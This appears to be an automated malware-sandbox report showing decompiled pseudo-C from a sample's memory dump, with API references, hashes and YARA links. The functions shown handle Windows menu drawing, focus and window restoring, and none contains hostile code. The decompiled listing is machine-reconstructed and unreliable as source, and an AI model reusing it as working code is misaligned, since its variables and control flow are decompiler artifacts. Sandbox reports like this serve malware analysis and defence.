				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				void* _t252;
				signed int _t258;
				void* _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t308;
				intOrPtr _t312;
				intOrPtr _t334;
				intOrPtr _t343;
				intOrPtr _t347;
				intOrPtr* _t354;
				signed int _t356;
				intOrPtr* _t357;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				intOrPtr* _t376;
				void* _t378;
				void* _t379;
				intOrPtr _t380;
				void* _t381;

				_t378 = _t379;
				_t380 = _t379 + 0xffffffd0;
				_v52 = 0;
				_t376 = __edx;
				_v8 = __eax;
				_push(_t378);
				_push(0x4498d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t380;
				_t137 =  *__edx;
				_t381 = _t137 - 0x111;
				if(_t381 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t272;
						if(_t272 < 0) {
							goto L67;
						} else {
							_t273 = _t272 + 1;
							_t368 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044874C(E004141BC(_v8, _t368),  *(_t376 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t368 = _t368 + 1;
								_t273 = _t273 - 1;
								__eflags = _t273;
								if(_t273 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t275;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49111c; // 0x492c04
								E00455E34( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t276 = _t275 + 1;
								_t369 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t376 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t376 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
										}
									}
									_t158 = E004141BC(_v8, _t369);
									_t296 = _v17;
									_v16 = E00448690(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t369 = _t369 + 1;
									_t276 = _t276 - 1;
									__eflags = _t276;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00432CEC( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
								_t165 =  *0x49111c; // 0x492c04
								E00455E34( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t278;
								if(_t278 < 0) {
									goto L67;
								} else {
									_t279 = _t278 + 1;
									_t370 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E004141BC(_v8, _t370);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t376 + 8);
										if(_t173 ==  *(_t376 + 8)) {
											break;
										}
										_t177 = E00448690(_v48, 1,  *(_t376 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t370 = _t370 + 1;
											_t279 = _t279 - 1;
											__eflags = _t279;
											if(_t279 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00448F90(_v48, _t376);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t381 == 0) {
						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t281;
						if(_t281 < 0) {
							goto L67;
						} else {
							_t282 = _t281 + 1;
							_t371 = 0;
							__eflags = 0;
							while(1) {
								E004141BC(_v8, _t371);
								_t181 = E00448730( *(_t376 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t371 = _t371 + 1;
								_t282 = _t282 - 1;
								__eflags = _t282;
								if(_t282 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t284;
							if(_t284 < 0) {
								goto L67;
							} else {
								_t285 = _t284 + 1;
								_t372 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E00448690(E004141BC(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t372 = _t372 + 1;
									_t285 = _t285 - 1;
									__eflags = _t285;
									if(_t285 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041FD3C(0, 1);
								_push(_t378);
								_push(0x449706);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t378);
								_push(0x4496e9);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								E00420784(_v24,  *(_v40 + 0x18));
								E00420600(_v24);
								E00449B78(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t334);
								 *[fs:eax] = _t334;
								_push(0x4496f0);
								__eflags = 0;
								E00420784(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t287;
								if(_t287 < 0) {
									goto L67;
								} else {
									_t288 = _t287 + 1;
									_t373 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E00448690(E004141BC(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t373 = _t373 + 1;
										_t288 = _t288 - 1;
										__eflags = _t288;
										if(_t288 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_v32 = GetWindowDC( *(_v8 + 0x10));
									 *[fs:eax] = _t380;
									_v24 = E0041FD3C(0, 1);
									 *[fs:eax] = _t380;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t380;
									E00420784(_v24, _v32);
									E00420600(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x449807, _t378,  *[fs:eax], 0x449824, _t378,  *[fs:eax], 0x449849, _t378);
									_pop(_t343);
									 *[fs:eax] = _t343;
									_push(0x44980e);
									__eflags = 0;
									E00420784(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t291;
									if(_t291 < 0) {
										goto L67;
									} else {
										_t292 = _t291 + 1;
										_t374 = 0;
										__eflags = 0;
										while(1) {
											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E004141BC(_v8, _t374))) + 0x34))();
											_t347 = _v36;
											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
												_v16 = E00448690(E004141BC(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E004141BC(_v8, _t374) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t374 = _t374 + 1;
											_t292 = _t292 - 1;
											__eflags = _t292;
											if(_t292 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t258 = E004486C0(E004141BC(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t258;
										if(_t258 == 0) {
											_t266 = E004141BC(_v8, _t374);
											__eflags = 0;
											_t258 = E004486C0(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t354 =  *0x491278; // 0x492c08
										_t356 =  *( *_t354 + 0x6c);
										__eflags = _t356;
										if(_t356 != 0) {
											__eflags = _t258;
											if(_t258 == 0) {
												_t258 =  *(_t356 + 0x158);
											}
											_t308 =  *0x491278; // 0x492c08
											__eflags =  *(_t356 + 0x228) & 0x00000008;
											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
												_t357 =  *0x49111c; // 0x492c04
												E00455AD0( *_t357, _t292, _t308, _t258, _t374, _t376);
											} else {
												E00455B38();
											}
										}
									}
								} else {
									L67:
									_push( *(_t376 + 8));
									_push( *(_t376 + 4));
									_push( *_t376);
									_t144 =  *(_v8 + 0x10);
									_push(_t144);
									L00406D8C();
									 *(_t376 + 0xc) = _t144;
								}
								L68:
								_pop(_t312);
								 *[fs:eax] = _t312;
								_push(0x4498da);
								return E00404348( &_v52);
							}
						}
					}
				}
				L69:
			}

0x004493a1
0x004493a3
0x004493ab
0x004493ae
0x004493b0
0x004493b5
0x004493b6
0x004493bb
0x004493be
0x004493c1
0x004493c3
0x004493c8
0x004493ea
0x004493ea
0x004493ef
0x0044943e
0x0044943f
0x00449441
0x00000000
0x00449447
0x00449447
0x00449448
0x00449448
0x0044944a
0x00449457
0x0044945c
0x0044945e
0x00000000
0x00000000
0x00449464
0x00449465
0x00449465
0x00449466
0x00000000
0x00449468
0x00000000
0x00449468
0x00000000
0x00449466
0x0044944a
0x004493f1
0x004493f1
0x004493f1
0x004493f4
0x0044946d
0x00449471
0x00449475
0x00449477
0x00449477
0x00449481
0x00449482
0x00449484
0x004494fa
0x004494fa
0x00449503
0x00000000
0x00449486
0x00449486
0x00449487
0x00449487
0x00449489
0x00449489
0x0044948d
0x004494b3
0x0044948f
0x0044948f
0x00449492
0x00449494
0x004494a6
0x00449496
0x004494a1
0x004494a1
0x00449494
0x004494bb
0x004494c0
0x004494cb
0x004494ce
0x004494d2
0x00000000
0x00000000
0x004494f6
0x004494f7
0x004494f7
0x004494f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004494f8
0x004494dd
0x004494e5
0x004494ec
0x004494ec
0x004493f6
0x004493f6
0x004493f7
0x00449860
0x00449861
0x00449863
0x00000000
0x00449865
0x00449865
0x00449866
0x00449866
0x00449868
0x00449872
0x0044987a
0x0044987d
0x00449880
0x00000000
0x00000000
0x0044988a
0x0044988f
0x00449891
0x0044989f
0x004498a0
0x004498a0
0x004498a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00449891
0x00449898
0x00449898
0x004493fd
0x00000000
0x004493fd
0x004493f7
0x004493f4
0x00000000
0x004493ca
0x004493ca
0x00449408
0x00449409
0x0044940b
0x00000000
0x00449411
0x00449411
0x00449412
0x00449412
0x00449414
0x00449419
0x00449422
0x00449427
0x00449429
0x00000000
0x00000000
0x0044942f
0x00449430
0x00449430
0x00449431
0x00000000
0x00449433
0x00000000
0x00449433
0x00000000
0x00449431
0x00449414
0x00000000
0x004493cc
0x004493cc
0x004493cf
0x00449612
0x0044961b
0x0044961c
0x0044961e
0x00000000
0x00449624
0x00449624
0x00449625
0x00449625
0x00449627
0x0044963e
0x00449641
0x00449645
0x00000000
0x00000000
0x0044970d
0x0044970e
0x0044970e
0x0044970f
0x00000000
0x00449715
0x00000000
0x00449715
0x00000000
0x0044970f
0x00449657
0x0044965c
0x0044965d
0x00449662
0x00449665
0x00449674
0x00449679
0x0044967a
0x0044967f
0x00449682
0x0044968e
0x004496a3
0x004496bc
0x004496c3
0x004496c6
0x004496c9
0x004496ce
0x004496d3
0x004496e8
0x004496e8
0x004493d5
0x004493d5
0x004493d6
0x0044971d
0x00449726
0x00449727
0x00449729
0x00000000
0x0044972f
0x0044972f
0x00449730
0x00449730
0x00449732
0x00449749
0x0044974c
0x00449750
0x00000000
0x00000000
0x00449850
0x00449851
0x00449851
0x00449852
0x00000000
0x00449858
0x00000000
0x00449858
0x00000000
0x00449852
0x00449762
0x00449770
0x0044977f
0x0044978d
0x00449799
0x004497a7
0x004497b0
0x004497c5
0x004497df
0x004497e4
0x004497e7
0x004497ea
0x004497ef
0x004497f4
0x00449806
0x00449806
0x004493dc
0x004493df
0x00449510
0x00449519
0x0044951a
0x0044951c
0x00000000
0x00449522
0x00449522
0x00449523
0x00449523
0x00449525
0x00449531
0x00449534
0x00449537
0x0044953a
0x00449565
0x0044953c
0x00449549
0x00449549
0x00449568
0x0044956c
0x00000000
0x00000000
0x00449602
0x00449603
0x00449603
0x00449604
0x00000000
0x0044960a
0x00000000
0x0044960a
0x00000000
0x00449604
0x00449584
0x00449589
0x0044958b
0x00449592
0x0044959d
0x0044959f
0x0044959f
0x004495a4
0x004495ac
0x004495af
0x004495b1
0x004495b7
0x004495b9
0x004495c0
0x004495c0
0x004495c6
0x004495cc
0x004495d3
0x004495ef
0x004495f8
0x004495d5
0x004495e5
0x004495e5
0x004495d3
0x004495b1
0x004493e5
0x004498a3
0x004498a6
0x004498aa
0x004498ad
0x004498b1
0x004498b4
0x004498b5
0x004498ba
0x004498ba
0x004498bd
0x004498bf
0x004498c2
0x004498c5
0x004498d2
0x004498d2
0x004493d6
0x004493cf
0x004493ca
0x00000000

APIs

SaveDC.GDI32(?), ref: 0044966F
RestoreDC.GDI32(?,?), ref: 004496E3
GetWindowDC.USER32(?,00000000,004498D3), ref: 0044975D
SaveDC.GDI32(?), ref: 00449794
RestoreDC.GDI32(?,?), ref: 00449801
NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004498D3), ref: 004498B5

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSaveWindow$NtdllProc_
String ID:
API String ID: 1346906915-0
Opcode ID: e6e53c3d7a4c52929fda6793c6f02bbbd30709ea8a32b9ac3a081f968d9be338
Instruction ID: 680f96552edb3fc9ed79ab1739da43706b8bfa7b11bc6686d55fcc6422e640b4
Opcode Fuzzy Hash: e6e53c3d7a4c52929fda6793c6f02bbbd30709ea8a32b9ac3a081f968d9be338
Instruction Fuzzy Hash: DAE15D74A042059FEB10EFAAC88199FF3F5FF89304B2585AAE411A7361D738ED41DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044EEA4, Relevance: 9.3, APIs: 6, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0044EEA4(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				intOrPtr* _t208;
				intOrPtr _t233;
				intOrPtr _t239;
				intOrPtr _t246;
				struct HWND__* _t250;
				struct HWND__* _t251;
				struct HWND__* _t256;
				intOrPtr* _t257;
				void* _t259;
				void* _t261;
				intOrPtr _t262;
				void* _t264;
				void* _t268;

				_t259 = _t261;
				_t262 = _t261 + 0xffffffec;
				_t208 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t264 = _t92 - 0x46;
				if(_t264 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037D8(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037D8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t264 == 0) {
						_t116 = _v8;
						_t233 =  *0x44f2d4; // 0x1
						__eflags = _t233 - ( *(_t116 + 0x1c) &  *0x44f2d0);
						if(_t233 == ( *(_t116 + 0x1c) &  *0x44f2d0)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t208 + 8)) + 0x18) =  *( *((intOrPtr*)(_t208 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x476b48;
							if( *0x476b48 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t256 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t256 = E0043C1F4(_t138);
												}
											}
										} else {
											_t141 = E0044F704(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t256 = E0043C1F4(E0044F704(_v8));
											}
										}
										__eflags = _t256;
										if(_t256 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t256);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t250 = E00448690( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t250;
										if(_t250 == 0) {
											goto L43;
										} else {
											_v16 = E0041FD3C(0, 1);
											_push(_t259);
											_push(0x44f11a);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t259);
											_push(0x44f0fd);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											E00420784(_v16,  *(_v24 + 0x18));
											E00420600(_v16);
											E00449B78(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t239);
											 *[fs:eax] = _t239;
											_push(0x44f104);
											__eflags = 0;
											E00420784(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t257 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t257 - 1;
									if( *_t257 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t251 = E00448690( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
											__eflags = _t251;
											if(_t251 == 0) {
												goto L43;
											} else {
												_v20 = GetWindowDC(E0043C1F4(_v8));
												 *[fs:eax] = _t262;
												_v16 = E0041FD3C(0, 1);
												 *[fs:eax] = _t262;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t262;
												E00420784(_v16, _v20);
												E00420600(_v16);
												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x44f204, _t259,  *[fs:eax], 0x44f221, _t259,  *[fs:eax], 0x44f248, _t259);
												_pop(_t246);
												 *[fs:eax] = _t246;
												_push(0x44f20b);
												__eflags = 0;
												E00420784(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t268 =  *_t208 -  *0x492c10; // 0xc075
									if(_t268 == 0) {
										E00436D28(_v8, 0, 0xb025, 0);
										E00436D28(_v8, 0, 0xb024, 0);
										E00436D28(_v8, 0, 0xb035, 0);
										E00436D28(_v8, 0, 0xb009, 0);
										E00436D28(_v8, 0, 0xb008, 0);
										E00436D28(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E00439CA4(_v8, _t208);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}

0x0044eea5
0x0044eea7
0x0044eead
0x0044eeaf
0x0044eeb2
0x0044eeb4
0x0044eeb7
0x0044eedc
0x0044eedc
0x0044eee1
0x0044ef8d
0x0044ef94
0x0044efa1
0x0044efa1
0x0044eee7
0x0044eee7
0x0044eee8
0x0044ef6c
0x0044ef73
0x0044ef80
0x0044ef80
0x0044eeea
0x00000000
0x0044eeea
0x0044eee8
0x00000000
0x0044eeb9
0x0044eeb9
0x0044efab
0x0044efb9
0x0044efc0
0x0044efc3
0x0044efc9
0x0044efd3
0x0044efd5
0x0044efd7
0x0044efda
0x0044efe1
0x0044efe3
0x0044efe6
0x0044efe6
0x0044efe6
0x0044efe6
0x0044efe1
0x0044eff3
0x0044eff3
0x0044eff5
0x0044efff
0x0044f008
0x0044f008
0x0044f00a
0x0044f014
0x0044f017
0x0044f00c
0x0044f00c
0x0044f00e
0x00000000
0x00000000
0x0044f00e
0x0044eff7
0x0044eff7
0x0044eff9
0x00000000
0x00000000
0x0044eff9
0x0044eff5
0x00000000
0x0044eebf
0x0044eec2
0x0044eec5
0x0044eeef
0x0044eef6
0x0044eefc
0x0044eeff
0x00000000
0x0044ef05
0x0044ef05
0x0044ef08
0x0044ef0c
0x00000000
0x0044ef12
0x0044ef12
0x0044ef14
0x0044ef17
0x0044ef1e
0x0044ef40
0x0044ef46
0x0044ef48
0x0044ef4a
0x0044ef4d
0x0044ef54
0x0044ef54
0x0044ef4d
0x0044ef20
0x0044ef23
0x0044ef28
0x0044ef2a
0x0044ef39
0x0044ef39
0x0044ef2a
0x0044ef56
0x0044ef58
0x00000000
0x0044ef5e
0x0044ef5f
0x0044ef5f
0x0044ef58
0x0044ef0c
0x0044eeff
0x00000000
0x0044eec7
0x0044eec7
0x0044eeca
0x0044f023
0x0044f029
0x0044f02c
0x00000000
0x0044f032
0x0044f032
0x0044f035
0x0044f03c
0x00000000
0x0044f042
0x0044f058
0x0044f05a
0x0044f05c
0x00000000
0x0044f062
0x0044f06e
0x0044f073
0x0044f074
0x0044f079
0x0044f07c
0x0044f08b
0x0044f090
0x0044f091
0x0044f096
0x0044f099
0x0044f0a5
0x0044f0b8
0x0044f0d0
0x0044f0d7
0x0044f0da
0x0044f0dd
0x0044f0e2
0x0044f0e7
0x0044f0fc
0x0044f0fc
0x0044f05c
0x0044f03c
0x0044eed0
0x0044eed1
0x0044f121
0x0044f124
0x0044f127
0x00000000
0x0044f12d
0x0044f12d
0x0044f130
0x0044f137
0x00000000
0x0044f13d
0x0044f150
0x0044f152
0x0044f154
0x00000000
0x0044f15a
0x0044f168
0x0044f176
0x0044f185
0x0044f193
0x0044f19f
0x0044f1ad
0x0044f1b6
0x0044f1c9
0x0044f1dc
0x0044f1e1
0x0044f1e4
0x0044f1e7
0x0044f1ec
0x0044f1f1
0x0044f203
0x0044f203
0x0044f154
0x0044f137
0x0044eed7
0x0044f24f
0x0044f251
0x0044f257
0x0044f265
0x0044f276
0x0044f287
0x0044f298
0x0044f2a9
0x0044f2ba
0x0044f2ba
0x0044f2bf
0x0044f2c4
0x0044f2c9
0x0044f2cf
0x0044f2cf
0x0044eed1
0x0044eeca
0x0044eec5
0x0044eeb9

APIs

SetFocus.USER32(00000000), ref: 0044EF5F
SaveDC.GDI32(?), ref: 0044F086
RestoreDC.GDI32(?,?), ref: 0044F0F7
GetWindowDC.USER32(00000000), ref: 0044F163
SaveDC.GDI32(?), ref: 0044F19A
RestoreDC.GDI32(?,?), ref: 0044F1FE

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: 2f2cb70563da92b464fba4b795336a6927570e5e506edbfeab6571d9bbef98a6
Instruction ID: 422c6132e545bf21ba43120169389d5e6a566aa04ef9362ddfa3128736266a36
Opcode Fuzzy Hash: 2f2cb70563da92b464fba4b795336a6927570e5e506edbfeab6571d9bbef98a6
Instruction Fuzzy Hash: 7AB19035A00104EFEB10DFA9C585AAEB3F5FB18300F6540B6E804A7352CB79EE45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00454FFC, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00454FFC(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00453FF4( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043C1F4( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406D8C();
						}
					}
					_t26 =  *0x490fe4; // 0x492a9c
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x490fe4; // 0x492a9c
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E0044FDAC(_t36, 0);
						E00452184( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00454670(_t51);
					_t21 =  *0x492c08; // 0x221094c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043C1F4(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}

APIs

IsIconic.USER32 ref: 00455004
SetActiveWindow.USER32(?,?,?,?,00454A46,00000000,00454EE8), ref: 00455015
IsWindowEnabled.USER32(00000000), ref: 00455038
NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00454A46,00000000,00454EE8), ref: 00455051
SetWindowPos.USER32(?,00000000,00000000,?,?,00454A46,00000000,00454EE8), ref: 00455097
SetFocus.USER32(00000000,?,00000000,00000000,?,?,00454A46,00000000,00454EE8), ref: 004550DC

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
